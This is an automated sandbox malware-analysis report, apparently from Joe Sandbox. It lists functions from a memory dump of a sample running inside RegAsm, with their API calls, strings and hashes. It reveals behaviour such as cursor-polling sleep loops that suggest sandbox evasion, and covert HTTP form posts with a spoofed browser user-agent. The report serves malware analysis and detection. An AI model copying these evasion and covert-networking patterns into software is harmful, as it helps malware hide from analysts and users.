__aulldiv.LIBCMT ref: 0042B902
__aulldiv.LIBCMT ref: 0042B9DF
__aulldiv.LIBCMT ref: 0042BB05

Strings

n{, xrefs: 0042B997

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$AttributesErrorFileLast
String ID: n{
API String ID: 3597693367-2104556642
Opcode ID: fc4b3d48a0e8540657a869ce82f5b0197dc0f5a76b0b9dd1f948638ca3d1c01e
Instruction ID: 44c97013f5b65640722b1e4ba322d050673a7c89aed965f0a1b77def22a273ce
Opcode Fuzzy Hash: fc4b3d48a0e8540657a869ce82f5b0197dc0f5a76b0b9dd1f948638ca3d1c01e
Instruction Fuzzy Hash: 66A18471E002189FEB24CFA8DC81B9EBBB6FB88714F118169E508B7385D7786D418F94

Function 00432300 Relevance: 9.3, APIs: 6, Instructions: 343
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCursorPos.USER32(?), ref: 00432313
GetCursorPos.USER32(?), ref: 0043232A
Sleep.KERNEL32(?), ref: 004324E0
GetCursorPos.USER32(?), ref: 004324EA
__aulldiv.LIBCMT ref: 004325CD
Sleep.KERNEL32(?), ref: 004327B5

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Cursor$Sleep$__aulldiv
String ID:
API String ID: 1481957275-0
Opcode ID: d2eee400279e9d957e3da22267a717102f1fee945c863c47cfce2d3cd15cc7e2
Instruction ID: 375cfc09b03ecb9e91bc55ebd2385ec7a2d6df576953a530d1ac96b91999e4a1
Opcode Fuzzy Hash: d2eee400279e9d957e3da22267a717102f1fee945c863c47cfce2d3cd15cc7e2
Instruction Fuzzy Hash: F4F1D774E04219DFDB14CF98C990BAEBBB2FF88304F14819AD819A7345D778AA81CF55

Function 0050BE90 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 135
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(00000000,00000000,aaj38,?), ref: 0050BFF0
GetProcessHeap.KERNEL32(00000008,-00000001,00000000,aaj38,?), ref: 0050C013
HeapAlloc.KERNEL32(00000000), ref: 0050C01A
lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0050C02F

Strings

38a49, xrefs: 0050BFA2, 0050BFD1
aaj38, xrefs: 0050BEF9, 0050BF28

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Heap$AllocProcesslstrcpynlstrlen
String ID: 38a49$aaj38
API String ID: 2211197272-4103302207
Opcode ID: 0b38e6dc9dfddb6a82dbbfc2d87fad1cd76972d816bc31c6bfd17869f09f3cdf
Instruction ID: 5e0676a8408f78954a8867b468c635290f1cf33cd0337551ccb9147b7de26194
Opcode Fuzzy Hash: 0b38e6dc9dfddb6a82dbbfc2d87fad1cd76972d816bc31c6bfd17869f09f3cdf
Instruction Fuzzy Hash: 8D51FFB0D04249AFEF04DFA8D899BEEBFB1BF48304F10805AE515AB281D7755A85CF94

Function 00433CF0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 170COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00433D8D
__aulldiv.LIBCMT ref: 00433E47

Strings

n{, xrefs: 00433DFF
Content-Type: application/x-www-form-urlencoded, xrefs: 00433E74, 00433EA8
AU., xrefs: 00433DBB

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: AU.$Content-Type: application/x-www-form-urlencoded$n{
API String ID: 3732870572-2762896062
Opcode ID: df624c2c2c5016c4f16cf4b8889c68940a8cbf542f03a42d53686251b006da05
Instruction ID: 669cdcbc90d8bd02f8a37ada013642480785e7ccf461275370d6c2e67f3ef742
Opcode Fuzzy Hash: df624c2c2c5016c4f16cf4b8889c68940a8cbf542f03a42d53686251b006da05
Instruction Fuzzy Hash: 1E612EB1E00208ABDB14DFA9DC55BEEBBB5FF88304F508119E509BB380DB786945CB95

Function 004263E0 Relevance: 7.2, APIs: 2, Strings: 1, Instructions: 1923libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00423900: __aulldiv.LIBCMT ref: 00423C96

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004281FA
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042839F

Strings

0c\UU@, xrefs: 004266BE

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$__aulldiv
String ID: 0c\UU@
API String ID: 898380398-831922003
Opcode ID: 3b979697a2a28dc4638233d70ca8ea3be594a0fc403fc6354966161bc91f2c7b
Instruction ID: 5815af0ce324c93d44586b93ce555d085c74b246f2de5e0bfc69a2d9b84e3f3c
Opcode Fuzzy Hash: 3b979697a2a28dc4638233d70ca8ea3be594a0fc403fc6354966161bc91f2c7b
Instruction Fuzzy Hash: DB231870E052688FCB25CF68DC90BEEBBB1BF4A308F1481DAD449A7342D6356A85DF54

Function 0050BBB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0050B890: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050B8E4

InternetCloseHandle.WININET(00000000), ref: 0050BE57

Strings

{, xrefs: 0050BD81

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Internet$CloseHandleOpen
String ID: {
API String ID: 435140893-366298937
Opcode ID: a50ecd5835876eb8dd4a800f883d32f1f3cc1d675fc045545af166e7928cc127
Instruction ID: 303ff10650ca6c4884a928bc1d4f83d84d075c7b5ef5698bfc1688b859a78c2b
Opcode Fuzzy Hash: a50ecd5835876eb8dd4a800f883d32f1f3cc1d675fc045545af166e7928cc127
Instruction Fuzzy Hash: 2AA1F1B5D00209DFEB14DF98C895BEEBBB5BF48304F248159E905AB281D774AA45CFA0

Function 0051BD80 Relevance: 4.6, APIs: 3, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0051BE0E
GetLastError.KERNEL32 ref: 0051BE4F
SetLastError.KERNEL32(?,?,00000000,00000001,00000028,?,00000000,00000001,00000008), ref: 0051BEF4

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$HandleModule
String ID:
API String ID: 1090667551-0
Opcode ID: ab7339f71b8fd24bb1daaef78b96bdccfb41147339b43e99d32d35df6a0c16a1
Instruction ID: fe9c51b8f3508887e9fe5af8ccbade2a034f56e57b751b4b205892e94710cfb6
Opcode Fuzzy Hash: ab7339f71b8fd24bb1daaef78b96bdccfb41147339b43e99d32d35df6a0c16a1
Instruction Fuzzy Hash: D051D1B5E08288ABEF04DBF98C55AEFBFF56F5C200F0484ADF555E3282E63446048B60

Function 0051C020 Relevance: 3.2, APIs: 2, Instructions: 150COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(000005B6), ref: 0051C0CF
GetModuleHandleA.KERNEL32(00000000), ref: 0051C1AE

Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F

Part of subcall function 0051BD80: GetModuleHandleA.KERNEL32(00000000), ref: 0051BE0E
Part of subcall function 0051BD80: GetLastError.KERNEL32 ref: 0051BE4F

Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireErrorHandleLastModuleRelease$ConditionVariableWake
String ID:
API String ID: 1192564941-0
Opcode ID: 3f89afa71c7075e492d6af7dc15b532093546046b2053a90e5fd355856e0438f
Instruction ID: 69a9a7caf1b3a47ec4176bf7c1269fc47c7bd7e0e76803d0bab5eea4d85b5a08
Opcode Fuzzy Hash: 3f89afa71c7075e492d6af7dc15b532093546046b2053a90e5fd355856e0438f
Instruction Fuzzy Hash: E451C3B1D04249AFDB14DBF89845AEEBFB5BB98300F04456AF555A3282EA345A048BA1

Function 0053E01E Relevance: 1.7, APIs: 1, Instructions: 185COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0053E659

Part of subcall function 00540B81: RaiseException.KERNEL32(E06D7363,00000001,00000003,BS,?,?,?,?,0053E642,?,00588EB8), ref: 00540BE1

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFeaturePresentProcessorRaise
String ID:
API String ID: 1477838251-0
Opcode ID: cda199d53502993a2710c5678e1d9b98c84bcbcd67dc311b76dea8504dea9ae5
Instruction ID: 14de0478b3319b42f1111524a07ecd127b8ee99bbc73f54541f9c991690e3b7d
Opcode Fuzzy Hash: cda199d53502993a2710c5678e1d9b98c84bcbcd67dc311b76dea8504dea9ae5
Instruction Fuzzy Hash: 1A619071D012199BEB14CFA5DC8A7AEBBF4FB54310F24842AD805E7291E3B4AD48DB90

Function 00431A40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 00431AFC

Strings

n{, xrefs: 00431A9C
m, xrefs: 00431C48
eks, xrefs: 00431B33, 00431B62
}{, xrefs: 00431A4C
}, xrefs: 00431C44
j3l6lrek, xrefs: 00431BF1, 00431C20

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: eks$j3l6lrek$m$n{$}$}{
API String ID: 3732870572-2155061626
Opcode ID: 0accc94a4bc58bfe61f62816febfddff24b8cc2e2c39570b0174afeaf2475421
Instruction ID: 43188a1591aad1c34db43096a5003d9be3fc9e5e01c1351a24c8dc1fba59194c
Opcode Fuzzy Hash: 0accc94a4bc58bfe61f62816febfddff24b8cc2e2c39570b0174afeaf2475421
Instruction Fuzzy Hash: 83A103B0D042589FDF14CFA5C891BEEBBB1BF48304F1481AAD409AB341DB786A85CF95

Function 0050B890 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050B8E4
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0050BA08

Strings

6~swr, xrefs: 0050B9B0

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Open$HttpInternetRequest
String ID: 6~swr
API String ID: 3438448461-3949020348
Opcode ID: 663b295ad1e004887a0d64917906e1e8d2841d4388c1b4ab8657af88b613dfc7
Instruction ID: dfeebe113d482a7fc0d3fabec27dd4a5e230ccde294820cd5b2b94538c26df42
Opcode Fuzzy Hash: 663b295ad1e004887a0d64917906e1e8d2841d4388c1b4ab8657af88b613dfc7
Instruction Fuzzy Hash: B7B1F7B4E00208EBEB14CF95DC95BEEBBB5BF48704F108159E605BB280D7B9AA05DF54

Function 00557682 Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea39bd72b4469cb3e6f5953d31d5c595cd9ad22dc9afcdde99cbbff7fb928db5
Instruction ID: 7d99da20ef12af29ccd29c4ddb17e5e6c5c7c828da3b2614929e8c5234eecdb2
Opcode Fuzzy Hash: ea39bd72b4469cb3e6f5953d31d5c595cd9ad22dc9afcdde99cbbff7fb928db5
Instruction Fuzzy Hash: 58B11374A0824A9BDF11DFA8EC65BAD7FB0BF4D301F24015AEC45AB292C7709949CB60

Function 00431D20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00431A40: __aulldiv.LIBCMT ref: 00431AFC

Part of subcall function 00416D40: std::ios_base::clear.LIBCPMTD ref: 00416E67

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00431DD6

Part of subcall function 004141F0: std::ios_base::clear.LIBCPMTD ref: 00414372

Part of subcall function 00414120: std::ios_base::clear.LIBCPMTD ref: 0041417E

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00431EC1
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00431EF2

Strings

`@, xrefs: 00431DCC, 00431EB7, 00431EE8
`XA, xrefs: 00431DC3, 00431EAE, 00431EDF

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_std::ios_base::clear$__aulldiv
String ID: `XA$`@
API String ID: 3845869555-3161672447
Opcode ID: a60a9ab66fea74c40637482695fa9900cea410be327952e2ab23aa4d3da5d38c
Instruction ID: a3e28af1a6e542087ac90c1154b64dbc6460663fd420f83dfbf3d43e06370d13
Opcode Fuzzy Hash: a60a9ab66fea74c40637482695fa9900cea410be327952e2ab23aa4d3da5d38c
Instruction Fuzzy Hash: 2651E4B0E042588BDF04DFA4C9957FEBFB1AB86300F6040AAD9056B391DB795E80CB94

Function 0042BB80 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 0042BCA5
CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 0042BE18

Strings

n{, xrefs: 0042BC5D
}{, xrefs: 0042BC0F

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CreateDirectory
String ID: n{$}{
API String ID: 1884557851-1042045087
Opcode ID: 57d31d9b07f2c9b68748b03a49cb2556d4634acae0629ae0826cf215db5074a1
Instruction ID: 66b9d3cfa06ff6842aa64c5b26630d94d739c78e8baf54dc74469c93df3a3511
Opcode Fuzzy Hash: 57d31d9b07f2c9b68748b03a49cb2556d4634acae0629ae0826cf215db5074a1
Instruction Fuzzy Hash: 06A117B1E002189BDB14CFA9D891BEEBBB5FF88304F14806AE509B7351D7786A45CF54

Function 0050C070 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

@L, xrefs: 0050C0B7
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36, xrefs: 0050C1A8

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @L$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
API String ID: 0-928537598
Opcode ID: c8ce03a3233569af4ac6571cc91ac47f3734f59005d2c83e91e243b44067494e
Instruction ID: cd128c93f7bf3c8193ebd90fc6991d5aa691f55d1707b9aec00d476382a1c62c
Opcode Fuzzy Hash: c8ce03a3233569af4ac6571cc91ac47f3734f59005d2c83e91e243b44067494e
Instruction Fuzzy Hash: 5351C1B5E00209ABDB08DFD9D895BEEBBF5BF88300F10811AE505A7384D7746A41CB94

Function 00416D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00416E67

Strings

`XA, xrefs: 00416D73
WA, xrefs: 00416DEB

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID: WA$`XA
API String ID: 1443086396-855112263
Opcode ID: 9174b6db1c77a7698fd39d58929472cddf39052d8f216809a051ca9c6b75448d
Instruction ID: e507a5a32f7d3b5dcada019a18e74b4090ae13039539df578e4dc11480ba84bb
Opcode Fuzzy Hash: 9174b6db1c77a7698fd39d58929472cddf39052d8f216809a051ca9c6b75448d
Instruction Fuzzy Hash: EC41C774A04209EFDB04DF99C891BAEBBB1FF48304F118199E515AB391C775AE81CF94

Function 0041F8A0 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000001), ref: 0041F8D4
_com_issue_error.COMSUPP ref: 0041F8F2
_com_issue_error.COMSUPP ref: 0041F91B

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: _com_issue_error$AllocString
String ID:
API String ID: 245909816-0
Opcode ID: e7255eddcecd108b1ec4819fb13a0a921f67fbd0025f62f8febc3e52e8d4c349
Instruction ID: 0b77db6c1808a706a69a158a1ad001aa90e12922d7a39361793bd48e8c80f6db
Opcode Fuzzy Hash: e7255eddcecd108b1ec4819fb13a0a921f67fbd0025f62f8febc3e52e8d4c349
Instruction Fuzzy Hash: EB11D7B4900208EFDB00EF94C549B9DBBB1EF44304F2081A9D9096B391D7B9AE86DB85

Function 0054F61E Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0054F618,00000000,0054AEEA,?,?,6780E6CE,0054AEEA,?), ref: 0054F62F
TerminateProcess.KERNEL32(00000000,?,0054F618,00000000,0054AEEA,?,?,6780E6CE,0054AEEA,?), ref: 0054F636
ExitProcess.KERNEL32 ref: 0054F648

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9e78dbbd2fb4bca78452b5b966021151efd374b181a3b1eadfc29377a94dc8f9
Instruction ID: 3f3e1e3b99468d25dce7cab22bc1d67e34f82d963ad3b761a18f6f9253370fe0
Opcode Fuzzy Hash: 9e78dbbd2fb4bca78452b5b966021151efd374b181a3b1eadfc29377a94dc8f9
Instruction Fuzzy Hash: C6D09E3140010DBBDF113F69DC0D99A3F2DBF50355B454024F91987132DB729996EB94

Function 005584FB Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00557C11: GetConsoleOutputCP.KERNEL32(6780E6CE,00000000,00000000,00000000), ref: 00557C74

WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00588A50,00000014,0054F044,00000000,00000000,00000000), ref: 00558680
GetLastError.KERNEL32(?,00000000), ref: 0055868A

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 93fb4403363359f6b7e5581cd26bd50e14db84a2fa6c457b04d38745cbba1a44
Instruction ID: 7e5d937b40cb86f1a91303876627bbacf9d7c5db9323ae4555d6a3acf967a568
Opcode Fuzzy Hash: 93fb4403363359f6b7e5581cd26bd50e14db84a2fa6c457b04d38745cbba1a44
Instruction Fuzzy Hash: 15619FB580011AAFDF11CFA8C895ABEBFB9BB59305F140556EC00B7252EB31D9099B90

Function 00413370 Relevance: 3.2, APIs: 2, Instructions: 151COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004134A2
__fread_nolock.LIBCMT ref: 004134F2

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 14857784439bfb0fded491df7ca2f4847927c5f8360138fd09694560756da3c4
Instruction ID: 4da88d6e4580d709966acb3d768c5fb75a167052d54c8e7bb3f1329e39569909
Opcode Fuzzy Hash: 14857784439bfb0fded491df7ca2f4847927c5f8360138fd09694560756da3c4
Instruction Fuzzy Hash: 39617475A00109EFCB04CF98C594AEEBBB2FF88305F2081AAE915A7355D735AE81DF54

Function 0054AD81 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,0054AD43,?,?,?,?,?), ref: 0054ADBD
GetLastError.KERNEL32(?,?,0054AD43,?,?,?,?,?,00588670,00000018,0054AF14,?,?,?,?,?), ref: 0054ADCA

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 18814e3d3e58956b9308e51246905c2eb57ed305e40aec464cc30f1ce1f8c9c6
Instruction ID: abae82f093606e27b09ad9464b4b3d0b26caf41557f2d5079a521825cfa87877
Opcode Fuzzy Hash: 18814e3d3e58956b9308e51246905c2eb57ed305e40aec464cc30f1ce1f8c9c6
Instruction Fuzzy Hash: B5010436A14115AFCB058F99DC09DDE3F29FB85325B280209F8119B190E671E9419B90

Function 0055A5CE Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0055F161,0041C3C8,00000000,0041C3C8,?,0055F402,0041C3C8,00000007,0041C3C8,?,0055F9F7,0041C3C8,0041C3C8), ref: 0055A5E4
GetLastError.KERNEL32(0041C3C8,?,0055F161,0041C3C8,00000000,0041C3C8,?,0055F402,0041C3C8,00000007,0041C3C8,?,0055F9F7,0041C3C8,0041C3C8), ref: 0055A5EF

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 364a6fa1e6d3d315b57dd3f44d38bfd42cd22917b739c09a8305668c146bf35e
Instruction ID: 181b53875a92b3ffd0e18ca616cb6882ade8f9942b46c1f443859408c2ee667b
Opcode Fuzzy Hash: 364a6fa1e6d3d315b57dd3f44d38bfd42cd22917b739c09a8305668c146bf35e
Instruction Fuzzy Hash: 32E08C32A04204ABDF212FA6EC0DB9A3F58BB403A6F284161FA18D6060DBB09984D795

Function 00557B71 Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00557A58,00000000,?,00588A30,0000000C,00557B14,MT,?), ref: 00557BC7
GetLastError.KERNEL32(?,00557A58,00000000,?,00588A30,0000000C,00557B14,MT,?), ref: 00557BD1

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 8aeb34b1122bea2897089ed340032fffe57dc5e1d5e65b1b18fd8521df8151a0
Instruction ID: 0ea216a494df05932795bb12278c4fed712d76d4d0375f6c705cae6cc8737cf8
Opcode Fuzzy Hash: 8aeb34b1122bea2897089ed340032fffe57dc5e1d5e65b1b18fd8521df8151a0
Instruction Fuzzy Hash: B81159365081185AD62112757C6DB6D2F59BB89B36F28021BFC188B1C2EA648C8C5250

Function 0054E275 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f58bbe6362517f8939d61995812e340540805aafe0ad6d011666f991096d71
Instruction ID: 2084c553b3b9f275e34185bdb693a43adc2e45164d2a0e71ec78a3e3ac0d328b
Opcode Fuzzy Hash: 44f58bbe6362517f8939d61995812e340540805aafe0ad6d011666f991096d71
Instruction Fuzzy Hash: 0851A175A00104AFDF15DF58CC8AAE9BFB1FF89328F248558F8499B252D271EE41CB90

Function 004141F0 Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00414372

Memory Dump Source

Source File: 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID:
API String ID: 1443086396-0
Opcode ID: c0b83071acae89aeef5c8617323d510e3ce59be0cacf276acdf9a7531c41f33e
Instruction ID: 8e409c15ee317b51c278df72e56b2589d090603ccf85a204518ff5c11603a3ed
Opcode Fuzzy Hash: c0b83071acae89aeef5c8617323d510e3ce59be0cacf276acdf9a7531c41f33e
Instruction Fuzzy Hash: 69519EB4E04249DFCB14CF99D491AEEFBB1BF88310F24815AE915AB395C734A981CF94

Function 00431F00 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000), ref: 00431FDA

Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F

Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
